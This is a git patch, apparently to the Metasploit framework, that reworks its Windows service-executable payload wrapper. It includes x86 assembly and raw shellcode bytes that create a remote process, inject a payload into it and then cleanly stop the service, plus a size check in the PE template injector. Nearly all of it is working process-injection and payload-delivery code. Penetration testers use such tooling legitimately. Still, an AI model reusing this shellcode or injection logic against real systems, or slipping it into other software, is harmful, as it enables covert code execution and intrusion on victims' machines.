From e269c1e4f1af56cbbddbcb2cddd796256400359a Mon Sep 17 00:00:00 2001
From: Florian Gaultier <florian@scrt.ch>
Date: Fri, 3 Jan 2014 15:12:25 +0100
Subject: [PATCH] Improve service_block with service_stopped block to cleanly
 terminate service

---
 .../src/block/block_create_remote_process.asm |  8 ++----
 .../x86/src/single/single_service_stuff.asm   |  7 ++++-
 lib/msf/util/exe.rb                           | 26 ++++++++++++++-----
 3 files changed, 28 insertions(+), 13 deletions(-)

diff --git a/external/source/shellcode/windows/x86/src/block/block_create_remote_process.asm b/external/source/shellcode/windows/x86/src/block/block_create_remote_process.asm
index 578ecd32a4..50252ad53e 100644
--- a/external/source/shellcode/windows/x86/src/block/block_create_remote_process.asm
+++ b/external/source/shellcode/windows/x86/src/block/block_create_remote_process.asm
@@ -50,7 +50,7 @@ pop edx
 
 mov edi, eax
 mov ecx, [esi]
-lea edx, [edx+0x47] ;pointer on the next shellcode
+add dword edx, 0x112247   ;pointer on the next shellcode
 push esp
 push 0x00001000	;Next Shellcode Size
 push edx		;
@@ -79,8 +79,4 @@ call ebp 		;call CloseHandle()
 mov ecx, [esi+0x4]
 push ecx
 push 0x528796C6
-call ebp 		;call CloseHandle()
-
-push edi
-push 0x56A2B5F0
-call ebp		;call ExitProcess(0)
+call ebp 		;call CloseHandle()
\ No newline at end of file
diff --git a/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm b/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm
index 5c848922ce..fe3a8aa3a0 100644
--- a/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm
+++ b/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm
@@ -14,4 +14,9 @@
 start:                   ;
   pop ebp                ; pop off the address of 'api_call' for calling later.
 %include "./src/block/block_service.asm"
-%include "./src/block/block_create_remote_process.asm"
\ No newline at end of file
+%include "./src/block/block_create_remote_process.asm"
+%include "./src/block/block_service_stopped.asm"
+
+push edi
+push 0x56A2B5F0
+call ebp		;call ExitProcess(0)
diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb
index 3413c4ebc1..d7d9a0944c 100644
--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -345,6 +345,9 @@ require 'msf/core/exe/segment_injector'
       characteristics = sec[1][characteristics_offset,0x4].unpack('L')[0]
 
       if (virtualAddress...virtualAddress+sizeOfRawData).include?(pe.hdr.opt.AddressOfEntryPoint)
+        if sizeOfRawData<code.length
+          raise RuntimeError, "The EXE::Template doesn't contain enough place to write the payload."
+        end
         # put this section writable
         characteristics |= 0x8000_0000
         newcharacteristics = [characteristics].pack('L')
@@ -518,12 +521,22 @@ require 'msf/core/exe/segment_injector'
       precode_size = 0xc6
       svcmain_code_offset = precode_size + pushed_service_name.length
 
-      precode_size += 0x06
+      precode_size = 0xcc
       hash_code_offset = precode_size + pushed_service_name.length
 
-      precode_size -= 0x0d
+      precode_size = 0xbf
       svcctrlhandler_code_offset = precode_size + pushed_service_name.length
 
+      code_service_stopped =
+        "\xE8\x00\x00\x00\x00\x5F\xEB\x07\x58\x58\x58\x58\x31\xC0\xC3" +
+         pushed_service_name+"\x89\xE1\x8D\x47\x03\x6A\x00" +
+        "\x50\x51\x68\x0B\xAA\x44\x52\xFF\xD5\x6A\x00\x6A\x00\x6A\x00\x6A" +
+        "\x00\x6A\x00\x6A\x00\x6A\x01\x6A\x10\x89\xE1\x6A\x00\x51\x50\x68" +
+        "\xC6\x55\x37\x7D\xFF\xD5\x57\x68\xF0\xB5\xA2\x56\xFF\xD5"
+
+      precode_size = 0x42
+      shellcode_code_offset = code_service_stopped.length + precode_size
+
       # code_service could be encoded in the future
       code_service =
         "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
@@ -549,12 +562,13 @@ require 'msf/core/exe/segment_injector'
         "\x6C\x6C\x33\x32\x68\x72\x75\x6E\x64\x89\xE1\x56\x50\x57\x57\x6A" +
         "\x44\x57\x57\x57\x51\x57\x68\x79\xCC\x3F\x86\xFF\xD5\x8B\x0E\x6A" +
         "\x40\x68\x00\x10\x00\x00\x68"+[code.length].pack('<I')+"\x57\x51\x68\xAE\x87" +
-        "\x92\x3F\xFF\xD5\xE8\x00\x00\x00\x00\x5A\x89\xC7\x8B\x0E\x8D\x52" +
-        "\x47\x54\x68"+[code.length].pack('<I')+"\x52\x50\x51\x68\xC5\xD8\xBD\xE7\xFF" +
+        "\x92\x3F\xFF\xD5\xE8\x00\x00\x00\x00\x5A\x89\xC7\x8B\x0E\x81\xC2" +
+         [shellcode_code_offset].pack('<I')+"\x54\x68"+[code.length].pack('<I') +
+        "\x52\x50\x51\x68\xC5\xD8\xBD\xE7\xFF" +
         "\xD5\x31\xC0\x8B\x0E\x50\x50\x50\x57\x50\x50\x51\x68\xC6\xAC\x9A" +
         "\x79\xFF\xD5\x8B\x0E\x51\x68\xC6\x96\x87\x52\xFF\xD5\x8B\x4E\x04" +
-        "\x51\x68\xC6\x96\x87\x52\xFF\xD5\x57\x68\xF0\xB5\xA2\x56\xFF\xD5"
-
+        "\x51\x68\xC6\x96\x87\x52\xFF\xD5" +
+         code_service_stopped
 
       return to_winpe_only(framework, code_service + code, opts)
     end